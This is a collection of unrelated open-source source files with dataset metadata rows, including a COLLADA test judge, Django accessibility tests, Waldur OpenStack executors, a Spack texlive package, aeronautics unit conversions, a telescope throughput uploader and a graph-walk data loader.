graph.GetXaxis().SetTitle(nominator.histo.GetXaxis().GetTitle())
info = nominator.all_info()
return wrappers.GraphWrapper(graph, **info)
if __name__ == "__main__":
import ROOT
ROOT.TH1.AddDirectory(False)
import doctest
doctest.testmod()
|
gpl-3.0
| 8,743,581,249,339,879,000
| 25.882488
| 93
| 0.552413
| false
| 3.053389
| false
| false
| false
|
KhronosGroup/COLLADA-CTS
|
StandardDataSets/1_5/collada/asset/coverage/geographic_location/absolute/absolute.py
|
1
|
4333
|
# Copyright (c) 2012 The Khronos Group Inc.
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and /or associated documentation files (the "Materials "), to deal in the Materials without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Materials, and to permit persons to whom the Materials are furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Materials.
# THE MATERIALS ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE MATERIALS OR THE USE OR OTHER DEALINGS IN THE MATERIALS.
# See Core.Logic.FJudgementContext for the information
# of the 'context' parameter.
# This sample judging object does the following:
#
# JudgeBaseline: just verifies that the standard steps did not crash.
# JudgeSuperior: also verifies that the validation steps are not in error.
# JudgeExemplary: same as intermediate badge.
# We import an assistant script that includes the common verifications
# methods. The assistant buffers its checks, so that running them again
# does not incur an unnecessary performance hit.
from StandardDataSets.scripts import JudgeAssistant
# Please feed your node list here:
tagLst = [['asset', 'coverage', 'geographic_location', 'longitude'],
['asset', 'coverage', 'geographic_location', 'latitude'],
['asset', 'coverage', 'geographic_location', 'altitude']]
attrName = 'mode'
attrVal = ''
dataToCheck = ''
class SimpleJudgingObject:
def __init__(self, _tagLst, _attrName, _attrVal, _data):
self.tagList = _tagLst
self.attrName = _attrName
self.attrVal = _attrVal
self.dataToCheck = _data
self.status_baseline = False
self.status_superior = False
self.status_exemplary = False
self.__assistant = JudgeAssistant.JudgeAssistant()
def JudgeBaseline(self, context):
        # No step should crash
self.__assistant.CheckCrashes(context)
# Import/export/validate must exist and pass, while Render must only exist.
self.__assistant.CheckSteps(context, ["Import", "Export", "Validate"], ["Render"])
self.status_baseline = self.__assistant.GetResults()
return self.status_baseline
# To pass intermediate you need to pass basic, this object could also include additional
# tests that were specific to the intermediate badge.
def JudgeSuperior(self, context):
self.status_superior = self.status_baseline
return self.status_superior
# To pass advanced you need to pass intermediate, this object could also include additional
# tests that were specific to the advanced badge
def JudgeExemplary(self, context):
# if superior fails, no point in further checking
if (self.status_superior == False):
self.status_exemplary = self.status_superior
return self.status_exemplary
# Compare the rendered images
self.__assistant.CompareRenderedImages(context)
self.__assistant.ElementDataPreserved(context, self.tagList[0], "float")
self.__assistant.ElementDataPreserved(context, self.tagList[1], "float")
self.__assistant.ElementDataPreserved(context, self.tagList[2], "float")
self.__assistant.AttributePreserved(context, self.tagList[2], self.attrName)
self.status_exemplary = self.__assistant.DeferJudgement(context)
return self.status_exemplary
# This is where all the work occurs: "judgingObject" is an absolutely necessary token.
# The dynamic loader looks very specifically for a class instance named "judgingObject".
#
judgingObject = SimpleJudgingObject(tagLst, attrName, attrVal, dataToCheck);
|
mit
| 4,687,221,361,627,715,000
| 52.225
| 466
| 0.708054
| false
| 4.182432
| false
| false
| false
|
ministryofjustice/manchester_traffic_offences_pleas
|
apps/plea/tests/test_accessibility_switcher.py
|
1
|
2202
|
from django.test import TestCase
from django.test.client import Client
from django.conf import settings
from importlib import import_module
from waffle.models import Switch
class TestAccessibilitySwitcher(TestCase):
def setUp(self):
self.client = Client()
# http://code.djangoproject.com/ticket/10899
settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file'
engine = import_module(settings.SESSION_ENGINE)
store = engine.SessionStore()
store.save()
self.session = store
self.client.cookies[settings.SESSION_COOKIE_NAME] = store.session_key
def test_a11y_testing_waffle_switch_off(self):
response = self.client.get("/set-a11y-testing/")
self.assertEqual(response.status_code, 404)
def test_a11y_testing_mode_tota11y(self):
Switch.objects.create(name="enable_a11y_testing", active=True)
response = self.client.get("/set-a11y-testing/?mode=tota11y")
response = self.client.get("/")
self.assertContains(response, "/static/javascripts/vendor/tota11y.min.js")
def test_a11y_testing_mode_google(self):
Switch.objects.create(name="enable_a11y_testing", active=True)
response = self.client.get("/set-a11y-testing/?mode=google")
response = self.client.get("/")
self.assertContains(response, "/static/javascripts/vendor/axs_testing.js")
def test_a11y_testing_mode_off(self):
Switch.objects.create(name="enable_a11y_testing", active=True)
response = self.client.get("/set-a11y-testing/?mode=off")
response = self.client.get("/")
self.assertNotContains(response, "/static/javascripts/vendor/tota11y.min.js")
self.assertNotContains(response, "/static/javascripts/vendor/axs_testing.js")
def test_a11y_testing_mode_wrong(self):
Switch.objects.create(name="enable_a11y_testing", active=True)
response = self.client.get("/set-a11y-testing/?mode=gfhdjaks")
response = self.client.get("/")
self.assertNotContains(response, "/static/javascripts/vendor/tota11y.min.js")
self.assertNotContains(response, "/static/javascripts/vendor/axs_testing.js")
|
mit
| -3,648,315,149,922,748,000
| 36.965517
| 85
| 0.690736
| false
| 3.580488
| true
| false
| false
|
opennode/nodeconductor-assembly-waldur
|
src/waldur_mastermind/packages/executors.py
|
1
|
4271
|
from waldur_core.core import executors as core_executors
from waldur_core.core import tasks as core_tasks
from waldur_core.core import utils as core_utils
from waldur_core.structure import executors as structure_executors
from waldur_mastermind.packages.serializers import _get_template_quotas
from waldur_openstack.openstack import executors as openstack_executors
from . import tasks
class OpenStackPackageCreateExecutor(core_executors.BaseExecutor):
@classmethod
def get_task_signature(cls, package, serialized_package, **kwargs):
tenant = package.tenant
serialized_tenant = core_utils.serialize_instance(tenant)
service_settings = package.service_settings
serialized_service_settings = core_utils.serialize_instance(service_settings)
create_tenant = openstack_executors.TenantCreateExecutor.get_task_signature(
tenant, serialized_tenant, **kwargs
)
set_tenant_ok = openstack_executors.TenantCreateExecutor.get_success_signature(
tenant, serialized_tenant
)
populate_service_settings = tasks.OpenStackPackageSettingsPopulationTask().si(
serialized_package
)
create_service_settings = structure_executors.ServiceSettingsCreateExecutor.get_task_signature(
service_settings, serialized_service_settings
)
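        # The signatures below are chained with Celery's `|` operator: each
        # task runs only after the previous one succeeds (create the tenant,
        # mark it OK, populate the service settings, then create them).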
return (
create_tenant
| set_tenant_ok
| populate_service_settings
| create_service_settings
)
@classmethod
def get_success_signature(cls, package, serialized_package, **kwargs):
""" Get Celery signature of task that should be applied on successful execution. """
service_settings = package.service_settings
serialized_service_settings = core_utils.serialize_instance(service_settings)
return core_tasks.StateTransitionTask().si(
serialized_service_settings, state_transition='set_ok'
)
@classmethod
def get_failure_signature(cls, package, serialized_package, **kwargs):
return tasks.OpenStackPackageErrorTask().s(serialized_package)
class OpenStackPackageChangeExecutor(core_executors.BaseExecutor):
@classmethod
def get_success_signature(
cls,
tenant,
serialized_tenant,
new_template,
old_package,
service_settings,
**kwargs
):
service_settings = core_utils.serialize_instance(service_settings)
return tasks.LogOpenStackPackageChange().si(
serialized_tenant,
event='succeeded',
new_package=new_template.name,
old_package=old_package.template.name,
service_settings=service_settings,
)
@classmethod
def get_failure_signature(
cls,
tenant,
serialized_tenant,
new_template,
old_package,
service_settings,
**kwargs
):
service_settings = core_utils.serialize_instance(service_settings)
return tasks.LogOpenStackPackageChange().si(
serialized_tenant,
event='failed',
new_package=new_template.name,
old_package=old_package.template.name,
service_settings=service_settings,
)
@classmethod
def get_task_signature(
cls,
tenant,
serialized_tenant,
new_template,
old_package,
service_settings,
**kwargs
):
quotas = {
quota_field.name: value
for quota_field, value in _get_template_quotas(new_template).items()
}
push_quotas = openstack_executors.TenantPushQuotasExecutor.as_signature(
tenant, quotas=quotas
)
serialized_new_template = core_utils.serialize_instance(new_template)
serialized_old_package = core_utils.serialize_instance(old_package)
serialized_service_settings = core_utils.serialize_instance(service_settings)
success_package_change = tasks.OpenStackPackageSuccessTask().si(
serialized_tenant,
serialized_new_template,
serialized_old_package,
serialized_service_settings,
)
return push_quotas | success_package_change
|
mit
| -6,142,464,563,913,863,000
| 34.008197
| 103
| 0.656989
| false
| 4.53397
| false
| false
| false
|
iEngage/python-sdk
|
iengage_client/models/tag.py
|
1
|
3896
|
# coding: utf-8
"""
Stakeholder engagement API
This API enables Intelligent Engagement for your Business. iEngage is a platform that combines process, augmented intelligence and rewards to help you intelligently engage customers.
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class Tag(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, tag_id=None, tag_name=None, count=None):
"""
Tag - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'tag_id': 'int',
'tag_name': 'str',
'count': 'int'
}
self.attribute_map = {
'tag_id': 'tagId',
'tag_name': 'tagName',
'count': 'count'
}
self._tag_id = tag_id
self._tag_name = tag_name
self._count = count
@property
def tag_id(self):
"""
Gets the tag_id of this Tag.
:return: The tag_id of this Tag.
:rtype: int
"""
return self._tag_id
@tag_id.setter
def tag_id(self, tag_id):
"""
Sets the tag_id of this Tag.
:param tag_id: The tag_id of this Tag.
:type: int
"""
self._tag_id = tag_id
@property
def tag_name(self):
"""
Gets the tag_name of this Tag.
:return: The tag_name of this Tag.
:rtype: str
"""
return self._tag_name
@tag_name.setter
def tag_name(self, tag_name):
"""
Sets the tag_name of this Tag.
:param tag_name: The tag_name of this Tag.
:type: str
"""
self._tag_name = tag_name
@property
def count(self):
"""
Gets the count of this Tag.
:return: The count of this Tag.
:rtype: int
"""
return self._count
@count.setter
def count(self, count):
"""
Sets the count of this Tag.
:param count: The count of this Tag.
:type: int
"""
self._count = count
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
apache-2.0
| -7,756,863,969,602,901,000
| 23.35
| 186
| 0.500257
| false
| 4.189247
| false
| false
| false
|
EmreAtes/spack
|
var/spack/repos/builtin/packages/texlive/package.py
|
1
|
3446
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import os
class Texlive(Package):
"""TeX Live is a free software distribution for the TeX typesetting
    system. Heads up: it is not a reproducible installation."""
homepage = "http://www.tug.org/texlive"
# Install from specific site because the texlive mirrors do not
# all update in synchrony.
#
# BEWARE: TexLive updates their installs frequently (probably why
# they call it *Live*...). There is no good way to provide a
# repeatable install of the package.
#
# We're now pulling the installation bits from tug.org's repo of
# historic bits. This means that the checksum for the installer
# itself is stable. Don't let that fool you though, it's still
# installing TeX **LIVE** from e.g. ctan.math.... below, which is
# not reproducible.
version('live', '8f8fc301514c08a89a2e97197369c648',
url='ftp://tug.org/historic/systems/texlive/2017/install-tl-unx.tar.gz')
# There does not seem to be a complete list of schemes.
# Examples include:
# full scheme (everything)
# medium scheme (small + more packages and languages)
# small scheme (basic + xetex, metapost, a few languages)
# basic scheme (plain and latex)
# minimal scheme (plain only)
# See:
# https://www.tug.org/texlive/doc/texlive-en/texlive-en.html#x1-25025r6
variant(
'scheme',
default='small',
values=('minimal', 'basic', 'small', 'medium', 'full'),
description='Package subset to install'
)
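    # A usage sketch: the variant above is selected on the Spack command line,
    # e.g. `spack install texlive scheme=full`.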
depends_on('perl', type='build')
def install(self, spec, prefix):
# Using texlive's mirror system leads to mysterious problems,
# in lieu of being able to specify a repository as a variant, hardwire
# a particular (slow, but central) one for now.
_repository = 'http://ctan.math.washington.edu/tex-archive/systems/texlive/tlnet/'
env = os.environ
env['TEXLIVE_INSTALL_PREFIX'] = prefix
perl = which('perl')
scheme = spec.variants['scheme'].value
perl('./install-tl', '-scheme', scheme,
'-repository', _repository,
'-portable', '-profile', '/dev/null')
|
lgpl-2.1
| 428,417,736,615,517,630
| 42.620253
| 90
| 0.653511
| false
| 3.889391
| false
| false
| false
|
junzis/py-adsb-decoder
|
pyModeS/extra/aero.py
|
1
|
5201
|
"""
Functions for aeronautics in this module
- physical quantities always in SI units
- lat,lon,course and heading in degrees
International Standard Atmosphere
::
p,rho,T = atmos(H) # atmos as function of geopotential altitude H [m]
a = vsound(H) # speed of sound [m/s] as function of H[m]
    p = pressure(H)        # calls atmos but returns only pressure [Pa]
T = temperature(H) # calculates temperature [K]
    rho = density(H)       # calls atmos but returns only density [kg/m3]
Speed conversion at altitude H[m] in ISA
::
Mach = tas2mach(Vtas,H) # true airspeed (Vtas) to mach number conversion
    Vtas = mach2tas(Mach,H)   # mach number to true airspeed conversion
Vtas = eas2tas(Veas,H) # equivalent airspeed to true airspeed, H in [m]
Veas = tas2eas(Vtas,H) # true airspeed to equivent airspeed, H in [m]
Vtas = cas2tas(Vcas,H) # Vcas to Vtas conversion both m/s, H in [m]
Vcas = tas2cas(Vtas,H) # Vtas to Vcas conversion both m/s, H in [m]
Vcas = mach2cas(Mach,H) # Mach to Vcas conversion Vcas in m/s, H in [m]
    Mach = cas2mach(Vcas,H)   # Vcas to mach conversion Vcas in m/s, H in [m]
"""
import numpy as np
"""Aero and geo Constants """
kts = 0.514444 # knot -> m/s
ft = 0.3048 # ft -> m
fpm = 0.00508 # ft/min -> m/s
inch = 0.0254 # inch -> m
sqft = 0.09290304 # 1 square foot
nm = 1852. # nautical mile -> m
lbs = 0.453592 # pound -> kg
g0 = 9.80665 # m/s2, Sea level gravity constant
R = 287.05287 # m2/(s2 x K), gas constant, sea level ISA
p0 = 101325. # Pa, air pressure, sea level ISA
rho0 = 1.225 # kg/m3, air density, sea level ISA
T0 = 288.15 # K, temperature, sea level ISA
gamma = 1.40 # cp/cv for air
gamma1 = 0.2 # (gamma-1)/2 for air
gamma2 = 3.5 # gamma/(gamma-1) for air
beta = -0.0065 # [K/m] ISA temp gradient below tropopause
r_earth = 6371000. # m, average earth radius
a0 = 340.293988 # m/s, sea level speed of sound ISA, sqrt(gamma*R*T0)
def atmos(H):
# H in metres
T = np.maximum(288.15 - 0.0065 * H, 216.65)
rhotrop = 1.225 * (T / 288.15)**4.256848030018761
dhstrat = np.maximum(0., H - 11000.0)
rho = rhotrop * np.exp(-dhstrat / 6341.552161)
p = rho * R * T
return p, rho, T
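# Sanity check for atmos() at sea level (H = 0): T = 288.15 K, rho = 1.225 kg/m3
# and p = rho * R * T = 1.225 * 287.05287 * 288.15 ≈ 101325 Pa, matching p0.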
def temperature(H):
p, r, T = atmos(H)
return T
def pressure(H):
p, r, T = atmos(H)
return p
def density(H):
p, r, T = atmos(H)
return r
def vsound(H):
"""Speed of sound"""
T = temperature(H)
a = np.sqrt(gamma * R * T)
return a
def distance(lat1, lon1, lat2, lon2, H=0):
"""
Compute spherical distance from spherical coordinates.
For two locations in spherical coordinates
(1, theta, phi) and (1, theta', phi')
cosine( arc length ) =
sin phi sin phi' cos(theta-theta') + cos phi cos phi'
distance = rho * arc length
"""
# phi = 90 - latitude
phi1 = np.radians(90.0 - lat1)
phi2 = np.radians(90.0 - lat2)
# theta = longitude
theta1 = np.radians(lon1)
theta2 = np.radians(lon2)
cos = np.sin(phi1) * np.sin(phi2) * np.cos(theta1 - theta2) + np.cos(phi1) * np.cos(phi2)
cos = np.where(cos>1, 1, cos)
arc = np.arccos(cos)
dist = arc * (r_earth + H) # meters, radius of earth
return dist
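# Worked example for distance(): a quarter of the equator, from (0, 0) to
# (0, 90), gives cos = 0, arc = pi/2 and dist = pi/2 * r_earth ≈ 10,007,543 m.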
def bearing(lat1, lon1, lat2, lon2):
lat1 = np.radians(lat1)
lon1 = np.radians(lon1)
lat2 = np.radians(lat2)
lon2 = np.radians(lon2)
x = np.sin(lon2-lon1) * np.cos(lat2)
y = np.cos(lat1) * np.sin(lat2) \
- np.sin(lat1) * np.cos(lat2) * np.cos(lon2-lon1)
initial_bearing = np.arctan2(x, y)
initial_bearing = np.degrees(initial_bearing)
bearing = (initial_bearing + 360) % 360
return bearing
# -----------------------------------------------------
# Speed conversions, altitude H all in meters
# -----------------------------------------------------
def tas2mach(Vtas, H):
"""True Airspeed to Mach number"""
a = vsound(H)
Mach = Vtas/a
return Mach
def mach2tas(Mach, H):
"""Mach number to True Airspeed"""
a = vsound(H)
Vtas = Mach*a
return Vtas
def eas2tas(Veas, H):
"""Equivalent Airspeed to True Airspeed"""
rho = density(H)
Vtas = Veas * np.sqrt(rho0/rho)
return Vtas
def tas2eas(Vtas, H):
"""True Airspeed to Equivalent Airspeed"""
rho = density(H)
Veas = Vtas * np.sqrt(rho/rho0)
return Veas
def cas2tas(Vcas, H):
"""Calibrated Airspeed to True Airspeed"""
p, rho, T = atmos(H)
qdyn = p0*((1.+rho0*Vcas*Vcas/(7.*p0))**3.5-1.)
Vtas = np.sqrt(7.*p/rho*((1.+qdyn/p)**(2./7.)-1.))
return Vtas
def tas2cas(Vtas, H):
"""True Airspeed to Calibrated Airspeed"""
p, rho, T = atmos(H)
qdyn = p*((1.+rho*Vtas*Vtas/(7.*p))**3.5-1.)
Vcas = np.sqrt(7.*p0/rho0*((qdyn/p0+1.)**(2./7.)-1.))
return Vcas
def mach2cas(Mach, H):
"""Mach number to Calibrated Airspeed"""
Vtas = mach2tas(Mach, H)
Vcas = tas2cas(Vtas, H)
return Vcas
def cas2mach(Vcas, H):
"""Calibrated Airspeed to Mach number"""
Vtas = cas2tas(Vcas, H)
Mach = tas2mach(Vtas, H)
return Mach
|
mit
| 6,628,668,726,650,856,000
| 27.266304
| 93
| 0.584503
| false
| 2.725891
| false
| false
| false
|
saltastro/saltefficiency
|
dataquality/upload_throughput.py
|
1
|
4898
|
import os
import argparse
import glob
import traceback
import mysql
import dataquality as dq
def upload_throughput(sdb, infile, force=False):
"""Upload throughput measurements to the Science Database
Parameters
----------
sdb: ~mysql.sdb
Connection to the Science Database
infile: str
Path to file to upload to the database
force: bool
If True, it will update the database even if an entry
already exists
"""
# parse the name of the file
tab_name, obsdate = dq.parse_filename(infile)
# check if it is already in the table
sel_cmd = "{}_Id, Throughput_Id".format(tab_name)
tab_cmd = "{} join Throughput using (Throughput_Id) join NightInfo using (NightInfo_id) ".format(tab_name)
log_cmd = " Date = '{}-{}-{}'".format(obsdate[0:4], obsdate[4:6], obsdate[6:8])
record = sdb.select(sel_cmd, tab_cmd, log_cmd)
if len(record) > 0 and not force: return
if os.path.basename(infile).startswith('Rss'):
instr='Rss'
elif os.path.basename(infile).startswith('Salticam'):
instr='Salticam'
else:
raise ValueError("File name not recognized")
# parse the file and update or insert into the database
lines = open(infile).readlines()
if len(lines) < 3 :
raise ValueError("Insufficient number of lines in {}".format(infile))
stars = lines[0].strip()
comment = lines[1].strip().strip('\'')
nid = sdb.select('NightInfo_Id', 'NightInfo', log_cmd)[0][0]
#create throughput
try:
tid = sdb.select('Throughput_Id','Throughput', 'NightInfo_Id={}'.format(nid))[0][0]
except:
ins_cmd = "NightInfo_Id = {} , StarsUsed = '{}', Comments = '{}'".format(nid, stars, comment)
sdb.insert(ins_cmd, 'Throughput')
tid = sdb.select('Throughput_Id','Throughput', 'NightInfo_Id={}'.format(nid))[0][0]
if force:
upd_cmd = "StarsUsed = '{}', Comments = '{}'".format(stars, comment)
sdb.update(upd_cmd, 'Throughput', 'Throughput_Id={}'.format(tid))
# upload each of the filters
for l in lines[2:]:
if not l.strip(): return
l = l.split()
if instr == 'Rss':
l[0] = l[0].strip(',')
try:
fid = sdb.select('RssFilter_Id', 'RssFilter', 'Barcode="{}"'.format(l[0]))[0][0]
except IndexError:
raise ValueError('{} is not an RSS Filter'.format(l[0]))
ins_cmd = 'RssFilter_Id={}, RssThroughputMeasurement={}'.format(fid, l[1])
up_cmd = 'RssFilter_Id={} and Throughput_Id={}'.format(fid, tid)
elif instr == 'Salticam':
l[0] = l[0].strip(',')
try:
fid = sdb.select('SalticamFilter_Id', 'SalticamFilter', 'SalticamFilter_Name="{}"'.format(l[0]))[0][0]
except IndexError:
raise ValueError('{} is not an Salticam Filter'.format(l[0]))
ins_cmd = '{}Filter_Id={}, Throughput_Id={}, {}={}'.format(instr, fid, tid, tab_name, l[1])
if len(record)==0:
sdb.insert(ins_cmd, tab_name)
elif force:
up_cmd = '{}Filter_Id={} and Throughput_Id={}'.format(instr, fid, tid)
uid = sdb.select('{}_Id'.format(tab_name), tab_name, up_cmd)[0][0]
sdb.update(ins_cmd, tab_name, '{}_Id={}'.format(tab_name, uid))
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Upload throughput measurents ot the SDB')
parser.add_argument('-dir', dest='throughput_dir', action='store',
default='/salt/logs/dataquality/throughput/',
help='Directory with throughput files')
parser.add_argument('-f', dest='force', action='store_const',
const=True, default=False,
help='Force the updates')
parser.add_argument('-e', dest='email', action='store_const',
const=True, default=False,
help='Email error results')
args = parser.parse_args()
    user = os.environ['SDBUSER']
    password = os.environ['SDBPASS']
    # sdbhost and sdbname were undefined in the original; reading them from
    # the environment, like the credentials above, is an assumption
    sdbhost = os.environ['SDBHOST']
    sdbname = os.environ['SDBNAME']
    sdb = mysql.mysql(sdbhost, sdbname, user, password, port=3306)
#get the file names
error_msg = ''
for infile in glob.glob(args.throughput_dir+'*.txt'):
try:
upload_throughput(sdb, infile, force=args.force)
except ValueError, e:
error_msg += infile + '\n' + traceback.format_exc() + str(e) + '\n\n'
except IOError, e:
error_msg += infile + '\n' + traceback.format_exc() + str(e) + '\n\n'
if error_msg: print(error_msg)
    if args.email and error_msg:
mailuser = os.environ['MAILUSER']
mailpass = os.environ['MAILPASS']
        dq.send_email(error_msg, 'UPLOAD_THROUGHPUT Error', username=mailuser,
                      password=mailpass, to=os.environ['TPUTLIST'], sender=os.environ['MAILSENDER'])
|
bsd-3-clause
| 3,220,284,524,995,481,600
| 37.265625
| 117
| 0.57942
| false
| 3.518678
| false
| false
| false
|
yashchandak/GNN
|
Sample_Run/Seq_Dynamic/blogDWdata.py
|
1
|
6976
|
from __future__ import generators, print_function
import numpy as np
from copy import deepcopy
from random import shuffle
from scipy.io import loadmat
class DataSet(object):
def __init__(self, cfg):
"""Construct a DataSet.
"""
self.cfg = cfg
self.all_walks, self.node_seq = self.get_walks(cfg.walks_dir)
#self.node_seq = self.all_walks[:, -1] # index by ending node
self.all_labels = self.get_labels(cfg.label_dir)
self.all_features= self.get_fetaures(cfg.features_dir)
#Increment the positions by 1 and mark the 0th one as False
self.train_nodes = np.concatenate(([False], np.load(cfg.label_fold_dir + 'train_ids.npy')))
self.val_nodes = np.concatenate(([False], np.load(cfg.label_fold_dir + 'val_ids.npy')))
self.test_nodes = np.concatenate(([False], np.load(cfg.label_fold_dir + 'test_ids.npy')))
# [!!!IMP!!]Assert no overlap between test/val/train nodes
self.label_cache, self.update_cache = {0:list(self.all_labels[0])}, {}
def get_walks(self, path):
walks = np.fliplr(np.loadtxt(path, dtype=np.int)) # reverse the sequence
seq = deepcopy(walks[:,-1])
#rotate around the sequences, such that ends are padded with zeros
for i in range(np.shape(walks)[0]):
non_zeros = np.sum(walks[i] > 0)
walks[i] = np.roll(walks[i], non_zeros)
return walks, seq
def get_fetaures(self, path):
# Serves 2 purpose:
# a) add feature for dummy node 0 a.k.a <EOS> and <unlabeled>
# b) increments index of all features by 1, thus aligning it with indices in walks
all_features = np.load(path)
all_features = all_features.astype(np.float32, copy=False) # Required conversion for Python3
all_features = np.concatenate(([np.zeros(all_features.shape[1])], all_features), 0)
return all_features
def get_labels(self, path):
# Labels start with node '0'; Walks_data with node '1'
# To get corresponding mapping, increment the label node number by 1
# add label for dummy node 0 a.k.a <EOS> and <unlabeled>
all_labels = np.load(path)
all_labels = np.concatenate(([np.zeros(all_labels.shape[1])], all_labels), 0)
return all_labels
def accumulate_label_cache(self, labels, nodes):
#Aggregates all the labels for the corresponding nodes
#and tracks the count of updates made
default = (self.all_labels[0], 0) #Initial estimate -> all_zeros
labels = labels[0]
if self.cfg.data_sets.binary_label_updates:
#Convert to binary and keep only the maximum value as 1
amax = np.argmax(labels, axis = 1)
labels = np.zeros(labels.shape)
for idx, pos in enumerate(amax):
labels[idx,pos] = 1
for idx, node in enumerate(nodes):
prv_label, prv_count = self.update_cache.get(node, default)
new_label = prv_label + labels[idx]
new_count = prv_count + 1
self.update_cache[node] = (new_label, new_count)
def update_label_cache(self):
#Average all the predictions made for the corresponding nodes and reset cache
for k, v in self.update_cache.items():
self.label_cache[k] = list(v[0]/v[1])
self.update_cache = {}
def get_nodes(self, dataset):
nodes = []
if dataset == 'train':
nodes = self.train_nodes
elif dataset == 'val':
nodes = self.val_nodes
elif dataset == 'test':
nodes = self.test_nodes
elif dataset == 'all':
# Get all the nodes except the 0th node
nodes = [True]*len(self.train_nodes)
nodes[0] = False
else:
raise ValueError
return nodes
def next_batch(self, dataset, batch_size, shuffle=True):
nodes = self.get_nodes(dataset)
label_len = np.shape(self.all_labels)[1]
max_len = self.all_walks.shape[1]
# Get position of all walks ending with desired set of nodes
pos = []
seq = []
for node in np.where(nodes)[0]:
temp = np.where(self.node_seq == node)[0]
pos.extend(temp)
seq.extend([node]*len(temp))
pos = np.array(pos)
seq = np.array(seq)
if shuffle:
indices = np.random.permutation(len(pos))
pos = pos[indices]
seq = seq[indices]
if batch_size == -1:
batch_size = len(pos)
tot = len(pos)//batch_size
for i in range(0, len(pos), batch_size):
x = self.all_walks[pos[i: i + batch_size]]
            temp = np.array(x) > 0  # mark all non-zero (valid) inputs
lengths = max_len - np.sum(temp, axis=1)
x = np.swapaxes(x, 0, 1) # convert from (batch x step) to (step x batch)
# get labels for valid data points, for others: select the 0th label
x2 = [[self.label_cache.get(item, self.label_cache[0]) for item in row] for row in x]
y = [list(self.all_labels[item]) for item in seq[i: i+batch_size]]
# get features for all data points
x = [[self.all_features[item] for item in row] for row in x]
#seq = self.node_seq[pos[i: i + batch_size]]
yield (x, x2, seq, y, tot, lengths)
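    # Typical consumption of next_batch (a sketch; cfg and the batch size are
    # hypothetical):
    #   ds = DataSet(cfg)
    #   for x, x2, seq, y, tot, lengths in ds.next_batch('train', batch_size=64):
    #       ...  # x: per-step features, x2: cached label estimates, y: targets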
def next_batch_same(self, dataset, node_count=1):
nodes = self.get_nodes(dataset)
pos = []
counts = []
seq = []
for node in np.where(nodes)[0]:
temp = np.where(self.node_seq == node)[0]
counts.append(len(temp))
seq.append(node)
pos.extend(temp)
pos = np.array(pos)
start = 0
max_len = self.all_walks.shape[1]
# Get a batch of all walks for 'node_count' number of node
for idx in range(0, len(counts), node_count):
#print(idx)
            stop = start + np.sum(counts[idx:idx+node_count])  # start + total number of walks to be considered this time
x = self.all_walks[pos[start:stop]] #get the walks corresponding to respective positions
            temp = np.array(x) > 0  # mark all non-zero (valid) inputs
lengths = max_len - np.sum(temp, axis=1)
x = np.swapaxes(x, 0, 1) # convert from (batch x step) to (step x batch)
# get labels for valid data points, for others: select the 0th label
x2 = [[self.label_cache.get(item, self.label_cache[0]) for item in row] for row in x]
            y = [list(self.all_labels[item]) for item in x[-1,:]]  # not useful; only present for the sake of the placeholder
# get features for all data points
x = [[self.all_features[item] for item in row] for row in x]
start = stop
yield (x, x2, seq[idx:idx+node_count], counts[idx:idx+node_count], y, lengths)
|
mit
| -3,829,700,722,819,435,500
| 38.862857
| 120
| 0.578842
| false
| 3.559184
| false
| false
| false
|
DOV-Vlaanderen/pydov
|
setup.py
|
1
|
2043
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import find_packages, setup
with open('README.md') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
with open('requirements.txt') as f:
requirements = f.read().splitlines()
with open('requirements_dev.txt') as f:
# ignore the general requirements
requirements_dev = f.read().splitlines()[1:]
with open('requirements_doc.txt') as f:
requirements_doc = f.read().splitlines()
with open('requirements_vectorfile.txt') as f:
